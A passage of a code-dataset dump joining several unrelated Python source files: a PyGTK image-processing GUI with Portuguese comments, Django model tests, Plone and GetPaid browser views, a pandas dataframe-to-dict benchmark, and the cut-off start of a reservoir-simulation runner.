gui.get_widget(\"filtro_din_radiobutton_passa_alta\")\n self.rbFiltroDinMedia = gui.get_widget(\"filtro_din_radiobutton_media\")\n self.rbFiltroDinMediana = gui.get_widget(\"filtro_din_radiobutton_mediana\")\n self.rbFiltroDinHighBoost = gui.get_widget(\"filtro_din_radiobutton_highboost\")\n self.cbFiltroDin = gui.get_widget(\"filtro_din_combobox\")\n self.sbFiltroDin = gui.get_widget(\"filtro_din_spinbutton\")\n self.btFiltroDinExecutar = gui.get_widget(\"filtro_din_button_executar\")\n self.btFiltroDinSalvar = gui.get_widget(\"filtro_din_button_salvar\")\n \n \n #Controles da aba FILTROS\n self.fcFiltroOrigem = gui.get_widget(\"filtro_filechooserbutton_origem\")\n self.fcFiltroDestino = gui.get_widget(\"filtro_filechooserbutton_destino\")\n self.fcFiltroDestino_h = gui.get_widget(\"filtro_filechooserbutton_destino_h\")\n self.fcFiltroDestino_v = gui.get_widget(\"filtro_filechooserbutton_destino_v\")\n self.rbFiltroSobel = gui.get_widget(\"filtro_radiobutton_sobel\")\n self.rbFiltroRoberts = gui.get_widget(\"filtro_radiobutton_roberts\")\n self.rbFiltroPrewitt = gui.get_widget(\"filtro_radiobutton_prewitt\")\n self.btFiltroExecutar = gui.get_widget(\"filtro_button_executar\")\n self.btFiltroSalvar = gui.get_widget(\"filtro_button_salvar\")\n self.btFiltroSalvar_h = gui.get_widget(\"filtro_button_salvar_h\")\n self.btFiltroSalvar_v = gui.get_widget(\"filtro_button_salvar_v\")\n\n\n #Controles da aba OUTROS\n self.fcOutrosOrigem = gui.get_widget(\"out_filechooserbutton_origem\")\n self.fcOutrosDestino = gui.get_widget(\"out_filechooserbutton_destino\")\n self.btOutrosSalvar = gui.get_widget(\"out_button_salvar\")\n self.rbOutrosCrescimento = gui.get_widget(\"out_radiobutton_crescimento\")\n self.rbOutrosDeteccao = gui.get_widget(\"out_radiobutton_deteccao\")\n self.evOutros = gui.get_widget(\"out_eventos\")\n self.hsOutros = gui.get_widget(\"out_hscale\")\n self.txtOutrosVizinhos = gui.get_widget(\"out_txt_visitados\")\n \n \n \n #Associa os eventos aos controles\n \n #Eventos do menu\n self.btSair.connect(\"activate\", self.actSair)\n self.btSobre.connect(\"activate\", self.actSobre)\n \n \n #Eventos da aba ESCALA DE CINZA\n self.fcEscalaOrigem.connect(\"file-set\", self.actEscalaCinzaCarregaImagem)\n self.btEscalaExecutar.connect(\"clicked\", self.actEscalaCinzaExecutar)\n self.btEscalaSalvar.connect(\"clicked\", self.actEscalaCinzaSalvar)\n \n \n #Eventos da aba HISTOGRAMA\n self.fcHistogramaOrigem.connect(\"file-set\", self.actHistogramaCarregaImagem)\n self.btHistogramaExecutar.connect(\"clicked\", self.actHistogramaExecutar)\n \n \n #Eventos da aba LIMIARIZACAO\n self.fcLimiarizacaoOrigem.connect(\"file-set\", self.actLimiarizacaoCarregaImagem)\n self.btLimiarizacaoSalvar.connect(\"clicked\", self.actLimiarizacaoSalvar)\n self.evLimiarizacao.connect(\"button-press-event\", self.actLimiarizacaoPreencherRgb)\n self.hsLimiarizacao.connect(\"button-release-event\", self.actLimiarizacaoExecutar)\n \n \n #Eventos da aba OPERACOES ARITMETICAS\n self.fcOpAritmeticaOrigem1.connect(\"file-set\", self.actOpAritmeticaCarregaImagem1)\n self.fcOpAritmeticaOrigem2.connect(\"file-set\", self.actOpAritmeticaCarregaImagem2)\n self.btOpAritmeticaExecutar.connect(\"clicked\", self.actOpAritmeticaExecutar)\n self.btOpAritmeticaSalvar.connect(\"clicked\", self.actOpAritmeticaSalvar)\n \n \n #Eventos da aba OPERACOES LOGICAS\n self.fcOpLogicaOrigem1.connect(\"file-set\", self.actOpLogicaCarregaImagem1)\n self.fcOpLogicaOrigem2.connect(\"file-set\", self.actOpLogicaCarregaImagem2)\n self.btOpLogicaExecutar.connect(\"clicked\", self.actOpLogicaExecutar)\n self.btOpLogicaSalvar.connect(\"clicked\", self.actOpLogicaSalvar)\n \n \n #Eventos da aba FILTROS DINAMICOS\n self.fcFiltroDinOrigem.connect(\"file-set\", self.actFiltroDinCarregaImagem)\n self.btFiltroDinExecutar.connect(\"clicked\", self.actFiltroDinExecutar)\n self.btFiltroDinSalvar.connect(\"clicked\", self.actFiltroDinSalvar)\n \n \n #Eventos da aba FILTROS\n self.fcFiltroOrigem.connect(\"file-set\", self.actFiltroCarregaImagem)\n self.btFiltroExecutar.connect(\"clicked\", self.actFiltroExecutar)\n self.btFiltroSalvar.connect(\"clicked\", self.actFiltroSalvar)\n self.btFiltroSalvar_h.connect(\"clicked\", self.actFiltroSalvarHorizontal)\n self.btFiltroSalvar_v.connect(\"clicked\", self.actFiltroSalvarVertical)\n \n \n #Eventos da aba OUTROS\n self.fcOutrosOrigem.connect(\"file-set\", self.actOutrosCarregaImagem)\n self.btOutrosSalvar.connect(\"clicked\", self.actOutrosSalvar)\n self.evOutros.connect(\"button-press-event\", self.actOutrosPreencherPosicaoPixel)\n self.hsOutros.connect(\"button-release-event\", self.actOutrosExecutar)\n \n \n self.main_window.show_all()\n self.loop()\n\n\n #Metodo da GTK\n def loop(self):\n gtk.main()\n\n\n #Metodo que fecha o programa\n def actSair(self, widget):\n gtk.main_quit()\n \n \n #Metodo que abre a janela Sobre\n def actSobre(self, widget):\n Sobre()\n \n \n \n #Metodos de ESCALA DE CINZA\n \n #Metodo que carrega a imagem no widget de escala de cinza\n def actEscalaCinzaCarregaImagem(self, widget):\n imagem = self.gui.get_widget('escala_image_origem')\n imagem.set_from_file(self.fcEscalaOrigem.get_filename())\n imagem.show()\n\n\n #Metodo que gera a imagem em escala de cinza\n def actEscalaCinzaExecutar(self, widget):\n imageManager = ImageManager()\n imageManager.escala_cinza(self.fcEscalaOrigem.get_filename())\n imagem = self.gui.get_widget('escala_image_gerada')\n imagem.set_from_file(\"../img/modificada_escala_cinza.png\")\n imagem.show()\n \n \n #Metodo que salva a imagem em escala de cinza\n def actEscalaCinzaSalvar(self, widget):\n img = Image.open(\"../img/modificada_escala_cinza.png\")\n file = self.fcEscalaOrigem.get_filename().split(\"/\")\n img.save(self.fcEscalaDestino.get_filename() + \"/escala-cinza-\" + file[len(file) - 1])\n\n\n\n #Metodos de HISTOGRAMAS\n \n #Metodo que carrega a imagem no widget de histograma\n def actHistogramaCarregaImagem(self, widget):\n imagem = self.gui.get_widget('hist_image_origem')\n imagem.set_from_file(self.fcHistogramaOrigem.get_filename())\n imagem.show()\n\n\n #Metodo que gera os histogramas\n def actHistogramaExecutar(self, widget):\n imageManager = ImageManager()\n #Gera histograma escala de cinza\n imageManager.escala_cinza(self.fcHistogramaOrigem.get_filename())\n imageManager.histograma_escala_cinza(\"../img/modificada_escala_cinza.png\")\n imageManager.histograma_rgb(self.fcHistogramaOrigem.get_filename())\n imagem = self.gui.get_widget('hist_image_cinza')\n imagem.set_from_file(\"../img/histograma_escala_cinza.png\")\n imagem.show()\n #Gera histograma banda red\n imagem = self.gui.get_widget('hist_image_r')\n imagem.set_from_file(\"../img/histograma_red.png\")\n imagem.show()\n #Gera histograma banda green\n imagem = self.gui.get_widget('hist_image_g')\n imagem.set_from_file(\"../img/histograma_green.png\")\n imagem.show()\n #Gera histograma banda blue\n imagem = self.gui.get_widget('hist_image_b')\n imagem.set_from_file(\"../img/histograma_blue.png\")\n imagem.show()\n\n\n\n #Metodos de LIMIARIZACAO\n \n #Metodo que carrega a imagem no widget de limiarizacao\n def actLimiarizacaoCarregaImagem(self, widget):\n imagem = self.gui.get_widget('lim_image_origem')\n imagem.set_from_file(self.fcLimiarizacaoOrigem.get_filename())\n imagem.show()\n \n #Metodo que preenche o valor RGB do pixel clicado na imagem\n def actLimiarizacaoPreencherRgb(self, widget, event):\n img = Image.open(self.fcLimiarizacaoOrigem.get_filename())\n img.load()\n \n #Efetua os calculos do ponto X e Y clicado na tela\n if (img.size[0] < 610 and img.size[1] < 481) :\n pixel_x = event.get_coords()[0] - int((625 - img.size[0]) / 2)\n pixel_y = event.get_coords()[1] - int((480 - img.size[1]) / 2)\n elif (img.size[0] < 610) :\n pixel_x = event.get_coords()[0] - int((625 - img.size[0]) / 2)\n pixel_y = event.get_coords()[1]\n elif (img.size[1] < 481) :\n pixel_x = event.get_coords()[0]\n pixel_y = event.get_coords()[1] - int((480 - img.size[1]) / 2)\n else :\n pixel_x = event.get_coords()[0]\n pixel_y = event.get_coords()[1]\n \n if (pixel_x > 0 and pixel_x < img.size[0] and pixel_y > 0 and pixel_y < img.size[1]) :\n pixel = img.getpixel((pixel_x, pixel_y))\n try :\n self.txtLimiarizacaoR.set_text(str(pixel[0]))\n self.txtLimiarizacaoG.set_text(str(pixel[1]))\n self.txtLimiarizacaoB.set_text(str(pixel[2]))\n except : \n self.txtLimiarizacaoR.set_text(str(pixel))\n self.txtLimiarizacaoG.set_text(str(pixel))\n self.txtLimiarizacaoB.set_text(str(pixel))\n \n #Metodo que gera a imagem limiarizada\n def actLimiarizacaoExecutar(self, widget, arg):\n imageManager = ImageManager()\n #Caso a opcao seJA GLOBAL SIMPLES\n if (self.rbLimiarizacaoGlobal.get_active()):\n imageManager.limiarizacao_global_simples(self.fcLimiarizacaoOrigem.get_filename(), self.hsLimiarizacao.get_value())\n #Caso a opcao seja DIVERSAS VARIAVEIS\n else:\n imageManager.limiarizacao_diversas_variaveis(self.fcLimiarizacaoOrigem.get_filename(), self.hsLimiarizacao.get_value(), [int(self.txtLimiarizacaoR.get_text()), int(self.txtLimiarizacaoG.get_text()), int(self.txtLimiarizacaoB.get_text())])\n \n imagem = self.gui.get_widget('lim_image_gerada')\n imagem.set_from_file(\"../img/modificada_limiarizacao.png\")\n imagem.show()\n \n \n #Metodo que salva a imagem limiarizada\n def actLimiarizacaoSalvar(self, widget):\n img = Image.open(\"../img/modificada_limiarizacao.png\")\n file = self.fcLimiarizacaoOrigem.get_filename().split(\"/\")\n img.save(self.fcLimiarizacaoDestino.get_filename() + \"/limiarizacao-\" + file[len(file) - 1])\n \n\n\n #Metodos de OPERACOES ARITMETICAS\n \n #Metodo que carrega a imagem no widget de operacoes aritmeticas\n def actOpAritmeticaCarregaImagem1(self, widget):\n imagem = self.gui.get_widget('op_arit_image1')\n imagem.set_from_file(self.fcOpAritmeticaOrigem1.get_filename())\n imagem.show()\n \n \n #Metodo que carrega a imagem no widget de operacoes aritmeticas\n def actOpAritmeticaCarregaImagem2(self, widget):\n imagem = self.gui.get_widget('op_arit_image2')\n imagem.set_from_file(self.fcOpAritmeticaOrigem2.get_filename())\n imagem.show()\n\n\n #Metodo que gera a imagem apos ser executado a operacao aritmetica\n def actOpAritmeticaExecutar(self, widget):\n imageManager = ImageManager()\n #Caso a operacao seja de ADICAO\n if (self.rbOpAritmeticaAdicao.get_active()):\n imageManager.operacao_aritmetica_adicao_reescalonamento(self.fcOpAritmeticaOrigem1.get_filename(), self.fcOpAritmeticaOrigem2.get_filename())\n else:\n #Caso a operacao seja de SUBTRACAO\n if (self.rbOpAritmeticaSubtracao.get_active()):\n imageManager.operacao_aritmetica_subtracao(self.fcOpAritmeticaOrigem1.get_filename(), self.fcOpAritmeticaOrigem2.get_filename())\n #Caso a operacao seja de MULTIPLICACAO\n else:\n imageManager.operacao_aritmetica_multiplicacao(self.fcOpAritmeticaOrigem1.get_filename(), self.fcOpAritmeticaOrigem2.get_filename())\n \n imagem = self.gui.get_widget('op_arit_imagem_gerada')\n imagem.set_from_file(\"../img/modificada_operacao_aritmetica.png\")\n imagem.show()\n \n \n #Metodo que salva a imagem apos ser executado a operacao aritmetica\n def actOpAritmeticaSalvar(self, widget):\n img = Image.open(\"../img/modificada_operacao_aritmetica.png\")\n file = self.fcOpAritmeticaOrigem1.get_filename().split(\"/\")\n img.save(self.fcOpAritmeticaDestino.get_filename() + \"/operacao-aritmetica-\" + file[len(file) - 1])\n \n \n \n #Metodos de OPERACOES LOGICAS\n \n #Metodo que carrega a imagem no widget de operacoes logicas\n def actOpLogicaCarregaImagem1(self, widget):\n imagem = self.gui.get_widget('op_log_image1')\n imagem.set_from_file(self.fcOpLogicaOrigem1.get_filename())\n imagem.show()\n \n \n #Metodo que carrega a imagem no widget de operacoes logicas\n def actOpLogicaCarregaImagem2(self, widget):\n imagem = self.gui.get_widget('op_log_image2')\n imagem.set_from_file(self.fcOpLogicaOrigem2.get_filename())\n imagem.show()\n\n\n #Metodo que gera a imagem apos ser executado a operacao logicas\n def actOpLogicaExecutar(self, widget):\n imageManager = ImageManager()\n #Caso a operacao seja de AND\n if (self.rbOpLogicaAnd.get_active()):\n imageManager.operacao_logica_and(self.fcOpLogicaOrigem1.get_filename(), self.fcOpLogicaOrigem2.get_filename())\n else:\n #Caso a operacao seja de OR\n if (self.rbOpLogicaOr.get_active()):\n imageManager.operacao_logica_or(self.fcOpLogicaOrigem1.get_filename(), self.fcOpLogicaOrigem2.get_filename())\n #Caso a operacao seja de XOR\n else:\n imageManager.operacao_logica_xor(self.fcOpLogicaOrigem1.get_filename(), self.fcOpLogicaOrigem2.get_filename())\n \n imagem = self.gui.get_widget('op_log_imagem_gerada')\n imagem.set_from_file(\"../img/modificada_operacao_logica.png\")\n imagem.show()\n \n \n #Metodo que salva a imagem apos ser executado a operacao logicas\n def actOpLogicaSalvar(self, widget):\n img = Image.open(\"../img/modificada_operacao_logica.png\")\n file = self.fcOpLogicaOrigem1.get_filename().split(\"/\")\n img.save(self.fcOpLogicaDestino.get_filename() + \"/operacao-logica-\" + file[len(file) - 1])\n\n\n\n #Metodos de FILTROS DINAMICOS\n \n #Metodo que carrega a imagem no widget de filtro\n def actFiltroDinCarregaImagem(self, widget):\n imagem = self.gui.get_widget('filtro_din_image_origem')\n imagem.set_from_file(self.fcFiltroDinOrigem.get_filename())\n imagem.show()\n\n\n #Metodo que gera a imagem filtrada\n def actFiltroDinExecutar(self, widget):\n imageManager = ImageManager()\n index = self.cbFiltroDin.get_active()\n \n #Verifica qual sera o tamanho da mascara\n if (index == 2) :\n tamanho_matriz = 7\n elif (index == 1) :\n tamanho_matriz = 5\n else :\n tamanho_matriz = 3\n\n if (self.rbFiltroDinPassaAlta.get_active()):\n imageManager.filtro_passa_alta_basico(self.fcFiltroDinOrigem.get_filename(), tamanho_matriz)\n elif (self.rbFiltroDinMedia.get_active()):\n imageManager.filtro_media(self.fcFiltroDinOrigem.get_filename(), tamanho_matriz)\n elif (self.rbFiltroDinMediana.get_active()):\n imageManager.filtro_mediana(self.fcFiltroDinOrigem.get_filename(), tamanho_matriz)\n else :\n valor_a = self.sbFiltroDin.get_value()\n imageManager.filtro_high_boost(self.fcFiltroDinOrigem.get_filename(), tamanho_matriz, valor_a)\n \n imagem = self.gui.get_widget('filtro_din_image_gerada')\n imagem.set_from_file(\"../img/modificada_filtro.png\")\n imagem.show()\n \n \n #Metodo que salva a imagem filtrada\n def actFiltroDinSalvar(self, widget):\n img = Image.open(\"../img/modificada_filtro.png\")\n file = self.fcFiltroDinOrigem.get_filename().split(\"/\")\n img.save(self.fcFiltroDinDestino.get_filename() + \"/filtro-\" + file[len(file) - 1])\n\n\n\n #Metodos de FILTROS \n \n #Metodo que carrega a imagem no widget de filtro\n def actFiltroCarregaImagem(self, widget):\n imagem = self.gui.get_widget('filtro_image_origem')\n imagem.set_from_file(self.fcFiltroOrigem.get_filename())\n imagem.show()\n\n\n #Metodo que gera a imagem filtrada\n def actFiltroExecutar(self, widget):\n imageManager = ImageManager()\n\n if (self.rbFiltroSobel.get_active()):\n imageManager.filtro_sobel(self.fcFiltroOrigem.get_filename())\n elif (self.rbFiltroRoberts.get_active()):\n imageManager.filtro_roberts(self.fcFiltroOrigem.get_filename())\n else :\n imageManager.filtro_prewitt(self.fcFiltroOrigem.get_filename())\n \n imagem = self.gui.get_widget('filtro_image_gerada')\n imagem.set_from_file(\"../img/modificada_filtro.png\")\n imagem.show()\n imagem_h = self.gui.get_widget('filtro_image_gerada_h')\n imagem_h.set_from_file(\"../img/modificada_filtro_h.png\")\n imagem_h.show()\n imagem_v = self.gui.get_widget('filtro_image_gerada_v')\n imagem_v.set_from_file(\"../img/modificada_filtro_v.png\")\n imagem_v.show()\n \n \n #Metodo que salva a imagem filtrada\n def actFiltroSalvar(self, widget):\n img = Image.open(\"../img/modificada_filtro.png\")\n file = self.fcFiltroOrigem.get_filename().split(\"/\")\n img.save(self.fcFiltroDestino.get_filename() + \"/filtro-\" + file[len(file) - 1])\n\n\n #Metodo que salva a imagem filtrada\n def actFiltroSalvarHorizontal(self, widget):\n img = Image.open(\"../img/modificada_filtro_h.png\")\n file = self.fcFiltroOrigem.get_filename().split(\"/\")\n img.save(self.fcFiltroDestino_h.get_filename() + \"/filtro_h-\" + file[len(file) - 1])\n\n\n #Metodo que salva a imagem filtrada\n def actFiltroSalvarVertical(self, widget):\n img = Image.open(\"../img/modificada_filtro_v.png\")\n file = self.fcFiltroOrigem.get_filename().split(\"/\")\n img.save(self.fcFiltroDestino_v.get_filename() + \"/filtro_v-\" + file[len(file) - 1])\n \n \n \n #Metodos de OUTROS\n \n #Metodo que carrega a imagem no widget de outros\n def actOutrosCarregaImagem(self, widget):\n imagem = self.gui.get_widget('out_image_origem')\n imagem.set_from_file(self.fcOutrosOrigem.get_filename())\n imagem.show()\n \n #Metodo que preenche a posicao do pixel clicado na imagem\n def actOutrosPreencherPosicaoPixel(self, widget, event):\n img = Image.open(self.fcOutrosOrigem.get_filename())\n img.load()\n \n if (img.size[0] < 610 and img.size[1] < 481) :\n pixel_x = event.get_coords()[0] - int((625 - img.size[0]) / 2)\n pixel_y = event.get_coords()[1] - int((480 - img.size[1]) / 2)\n elif (img.size[0] < 610) :\n pixel_x = event.get_coords()[0] - int((625 - img.size[0]) / 2)\n pixel_y = event.get_coords()[1]\n elif (img.size[1] < 481) :\n pixel_x = event.get_coords()[0]\n pixel_y = event.get_coords()[1] - int((480 - img.size[1]) / 2)\n else :\n pixel_x = event.get_coords()[0]\n pixel_y = event.get_coords()[1]\n \n self.pixel_x = pixel_x\n self.pixel_y = pixel_y\n \n \n #Metodo que gera a imagem outros\n def actOutrosExecutar(self, widget, arg):\n imageManager = ImageManager()\n #Caso a opcao seja CRESCIMENTO DE REGIOES\n if (self.rbOutrosCrescimento.get_active()):\n self.txtOutrosVizinhos.set_text(imageManager.outros_crescimento_regioes(self.fcOutrosOrigem.get_filename(), self.hsOutros.get_value(), [int(self.pixel_x), int(self.pixel_y)]))\n #Caso a opcao seja DETECCAO DE BORDAS\n else:\n imageManager.outros_deteccao_de_bordas(self.fcOutrosOrigem.get_filename(), self.hsOutros.get_value())\n \n imagem = self.gui.get_widget('out_image_gerada')\n imagem.set_from_file(\"../img/modificada_outros.png\")\n imagem.show()\n \n \n #Metodo que salva a imagem limiarizada\n def actOutrosSalvar(self, widget):\n img = Image.open(\"../img/modificada_outros.png\")\n file = self.fcOutrosOrigem.get_filename().split(\"/\")\n img.save(self.fcOutrosDestino.get_filename() + \"/outros-\" + file[len(file) - 1])\n \n \n \n#Classe que gerencia a janela Sobre\nclass Sobre():\n \n \n #Construtor da classe\n def __init__(self):\n \n #Nome do arquivo Glade\n self.__glade_file_sobre = \"../xml/sobre.glade\"\n gui_sobre = gtk.glade.XML(self.__glade_file_sobre)\n self.gui_sobre = gui_sobre\n \n self.sobre_window = gui_sobre.get_widget(\"janela_sobre\")\n self.sobre_window.connect(\"destroy\", gtk.main_quit)\n \n gui_sobre.get_widget(\"sobre_fechar\").connect(\"clicked\", self.sair)\n \n self.sobre_window.show_all()\n self.loop()\n \n \n #Metodo que fecha o programa\n def sair(self, widget):\n self.sobre_window.destroy()\n \n \n #Metodo da GTK\n def loop(self):\n gtk.main()","repo_name":"cadicallegari/gipi","sub_path":"PI_TRABALHO_1/src/Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":25331,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8408575254","text":"from django.test import TestCase\n\nfrom ..models import Endereco, Pedido, Produto, User\nfrom ..utils import gerar_id\n\n\nclass UserTestCase(TestCase):\n @classmethod\n def setUpTestData(cls):\n User.objects.create(\n username='joaobobo123',\n email='jbobo123@yopmail.com',\n first_name='joão',\n last_name='bobo',\n cpf='11122233344',\n password='foo'\n )\n\n User.objects.create(\n username='adminbolado',\n email='admbolado123@yopmail.com',\n first_name='admin',\n last_name='bolado',\n password='bar',\n is_superuser=True\n )\n\n def test_user_str(self):\n user_normal = User.objects.get(email='jbobo123@yopmail.com')\n self.assertEqual(user_normal.__str__(), 'João Bobo')\n\n def test_superuser(self):\n super_user = User.objects.get(email='admbolado123@yopmail.com')\n self.assertTrue(super_user.is_superuser)\n\n\nclass ProdutoTestCase(TestCase):\n @classmethod\n def setUpTestData(cls):\n Produto.objects.create( # slug automático\n nome='Super Mario Odyssey',\n preco=197.875,\n score=100,\n )\n\n Produto.objects.create( # jogo com slug personalizado\n nome='Call Of Duty Infinite Warfare',\n preco=49.99,\n score=80,\n slug='cod-iw-ps4',\n )\n\n def test_slug_produto(self):\n p1 = Produto.objects.get(nome='Super Mario Odyssey')\n p2 = Produto.objects.get(nome='Call Of Duty Infinite Warfare')\n\n self.assertEqual(p1.slug, 'super-mario-odyssey')\n self.assertEqual(p2.slug, 'cod-iw-ps4')\n\n def test_preco_round(self):\n p1 = Produto.objects.get(nome='Super Mario Odyssey')\n\n self.assertEqual(p1.preco, 197.88)\n\n\nclass PedidoTestCase(TestCase):\n @classmethod\n def setUpTestData(cls):\n joao_bobo = User.objects.create(\n username='joaobobo123',\n email='jbobo123@yopmail.com',\n first_name='joão',\n last_name='bobo',\n password='foo'\n )\n\n # pedido de três produtos com subtotal de 197.88: o total deve ser 227.88\n Pedido.objects.create(\n subtotal=197.88,\n id_pedido=gerar_id(12),\n cliente=joao_bobo,\n quantidade=3\n )\n\n # pedido de cinco produtos com subtotal de 250: o total deve ser 250\n Pedido.objects.create(\n id_pedido=gerar_id(12),\n subtotal=250,\n cliente=joao_bobo,\n quantidade=5\n )\n\n def test_total(self):\n p1 = Pedido.objects.get(subtotal=197.88)\n p2 = Pedido.objects.get(subtotal=250)\n\n self.assertEqual(p1.total, 227.88)\n self.assertEqual(p2.total, 250)\n\n\nclass EnderecoTestCase(TestCase): # ok\n @classmethod\n def setUpTestData(cls):\n joao_bobo = User.objects.create(\n username='joaobobo123',\n email='jbobo123@yopmail.com',\n first_name='joão',\n last_name='bobo',\n password='foo'\n )\n\n Endereco.objects.create(\n cliente=joao_bobo,\n nome=joao_bobo.get_full_name(),\n cep='11111111',\n rua='Rua dos Bobos',\n residencia='0',\n bairro='Fictício',\n cidade='Bobolândia',\n estado='Fictício',\n )\n\n def test_endereco(self):\n e1 = Endereco.objects.get(rua='Rua dos Bobos')\n\n self.assertEqual(e1.nome, 'joão bobo')\n","repo_name":"and3rcg/ps-supera-backend","sub_path":"api/tests/tests_models.py","file_name":"tests_models.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70307170706","text":"# -*- coding: utf-8 -*-\n\nfrom plone.app.contenttypes.browser.collection import CollectionView\nfrom plone.protect.interfaces import IDisableCSRFProtection\nfrom zope.interface import alsoProvides\nimport logging\n\n\nlogger = logging.getLogger('collective.abctune:tunesListCollection ')\n\n\nclass tunesListCollection(CollectionView):\n \"\"\"\n code from plone.app.contenttypes.browser.collection.CollectionView\n \"\"\"\n \"\"\"\n def __call__(self):\n alsoProvides(self.request, IDisableCSRFProtection)\n \"\"\"\n\n def results(self, **kwargs):\n \"\"\"Return a content listing based result set with results from the\n collection query.\n\n :param **kwargs: Any keyword argument, which can be used for catalog\n queries.\n :type **kwargs: keyword argument\n\n :returns: plone.app.contentlisting based result set.\n :rtype: ``plone.app.contentlisting.interfaces.IContentListing`` based\n sequence.\n \"\"\"\n alsoProvides(self.request, IDisableCSRFProtection)\n # Extra filter\n contentFilter = self.request.get('contentFilter', {})\n contentFilter.update(kwargs.get('contentFilter', {}))\n kwargs.setdefault('custom_query', contentFilter)\n kwargs.setdefault('batch', True)\n kwargs.setdefault('b_size', self.b_size)\n kwargs.setdefault('b_start', self.b_start)\n\n results = self.collection_behavior.results(**kwargs)\n # here, we return a list of objects.\n return [obj.getObject() for obj in results]\n","repo_name":"erichardy/collective.abctune","sub_path":"src/collective/abctune/browser/tunes_list_collection.py","file_name":"tunes_list_collection.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33948936340","text":"from Products.Five import BrowserView\nfrom collective.beaker.interfaces import ISession\nfrom getpaid.core.interfaces import IOrderManager\nfrom zope.component import getUtility\n\n\nclass OrderConfirmationView(BrowserView):\n \n def __call__(self):\n session = ISession(self.request)\n order_id = session.get('groundwire.checkout.order_id', None)\n if order_id is not None:\n order_manager = getUtility(IOrderManager)\n order = order_manager.get(order_id)\n self.cart = order.shopping_cart\n if 'getpaid.processor.uid' in order.__annotations__:\n self.txn_id = order.__annotations__['getpaid.processor.uid']\n else:\n self.txn_id = None\n \n del session['groundwire.checkout.order_id']\n session.save()\n return self.index()\n","repo_name":"collective/groundwire.checkout","sub_path":"groundwire/checkout/browser/confirmation.py","file_name":"confirmation.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6033119645","text":"\"\"\"\n将一个 dataframe 转换成三重嵌套的 dict,采用三种不同的方法,完全不采用 dataframe,而是对纯 dict 进行处理的方式用时最少\nmethod 1 -- sum of time: 7.329394340515137\nmethod 2 -- sum of time: 1.2476661205291748\nmethod 3 -- sum of time: 0.05086255073547363\n\"\"\"\nimport pickle\nimport pandas as pd\nimport json\nimport time\n\n\nif __name__ == \"__main__\":\n start = time.time()\n data_dict = {}\n # df = pickle.load(open(\"d:/download/data_df.pkl\", \"rb\"))\n df = pd.read_pickle(r\"d:/download/data_df.pkl\")\n grouped = df.groupby(\"S_INFO_WINDCODE\")\n for name, group in grouped:\n time_dict = {}\n group.sort_values(by=\"EX_DATE\")\n for _, row in group.iterrows():\n element_dict = dict(row)\n del element_dict[\"S_INFO_WINDCODE\"]\n del element_dict[\"EX_DATE\"]\n time_dict[str(row[\"EX_DATE\"])] = element_dict\n data_dict[name] = time_dict\n end = time.time()\n print(\"method 1 -- sum of time: \", end - start)\n print(\"method 1 -- data_dict size {0}\".format(len(data_dict)))\n # json.dump(data_dict, open(\"d:/download/my_data_dict.json\", \"w\"), indent=4, ensure_ascii=False)\n\n start = time.time()\n data_df = pd.read_pickle(r'd:/download/data_df.pkl')\n data_df = data_df.fillna(0)\n data_dict = {}\n for name, group in data_df.groupby('S_INFO_WINDCODE'):\n v_dict = {}\n for vv in group.values:\n v_dict[vv[1]] = {\n 'CASH_DIVIDEND_RATIO': vv[2],\n 'BONUS_SHARE_RATIO': vv[3],\n 'RIGHTSISSUE_RATIO': vv[4],\n 'RIGHTSISSUE_PRICE': vv[5],\n 'CONVERSED_RATIO': vv[6]\n }\n data_dict[name] = v_dict\n end = time.time()\n print(\"method 2 -- sum of time: \", end - start)\n print(\"method 2 -- data_dict size {0}\".format(len(data_dict)))\n\n start = time.time()\n data = pd.read_pickle(r'd:/download/data_list.pkl')\n ssym = ''\n data_dict = {}\n cur_dict = {}\n for datal in data:\n if ssym != datal[0]:\n if ssym not in data_dict.keys():\n data_dict[datal[0]] = {}\n else:\n data_dict[ssym] = cur_dict\n data_dict[datal[0]] = {}\n cur_dict = {}\n ssym = datal[0]\n\n cur_dict[datal[1]] = {\n 'CASH_DIVIDEND_RATIO': datal[2],\n 'BONUS_SHARE_RATIO': datal[3],\n 'RIGHTSISSUE_RATIO': datal[4],\n 'RIGHTSISSUE_PRICE': datal[5],\n 'CONVERSED_RATIO': datal[6]\n }\n else:\n cur_dict[datal[1]] = {\n 'CASH_DIVIDEND_RATIO': datal[2],\n 'BONUS_SHARE_RATIO': datal[3],\n 'RIGHTSISSUE_RATIO': datal[4],\n 'RIGHTSISSUE_PRICE': datal[5],\n 'CONVERSED_RATIO': datal[6]\n }\n end = time.time()\n print(\"method 3 -- sum of time: \", end - start)\n print(\"method 3 -- data_dict size {0}\".format(len(data_dict)))\n","repo_name":"domodo2012/quandomo2020","sub_path":"trials/dataframe_to_dict.py","file_name":"dataframe_to_dict.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"75120191184","text":"from tqdm import tqdm\nimport sys\nimport os\nimport subprocess\nimport utils.utilities as u\nfrom datetime import datetime\nfrom pathlib import Path\n\n\nSTORAGE_DIR = './simulations/storage/'\nSTUDIES_DIR = './simulations/studies/'\n\ndef change_control(base_datafile_path, real_datafile_path, controls):\n \n with open(base_datafile_path, 'r') as file :\n filedata = file.read()\n \n # optimization\n for control in controls:\n Name = control[\"Name\"]\n Default = control[\"Default\"]\n if control['type'] == \"float\":\n replaced_value = '%.3f '%Default\n elif control['type'] == \"int\":\n replaced_value = '%s '%int(Default)\n \n filedata = filedata.replace(Name, replaced_value)\n \n # Write the file out again\n with open(real_datafile_path, 'w') as file:\n file.write(filedata)\n\ndef simulate_case(simulator_path, real_name, real_path):\n command = [simulator_path, '--enable-terminal-output=false', real_path]\n \n return command\n \ndef run_case(base_datafile_path, real_datafile_path, controls, simulator_path, real_name):\n change_control(base_datafile_path, real_datafile_path, controls)\n command = simulate_case(simulator_path, real_name, real_datafile_path)\n return command\n\ndef run_cases(simulator_path, study, simfolder_path, controls, n_parallel):\n \n _, tail = os.path.split(study['creation']['root']) # dir_path = /path/to/data\n 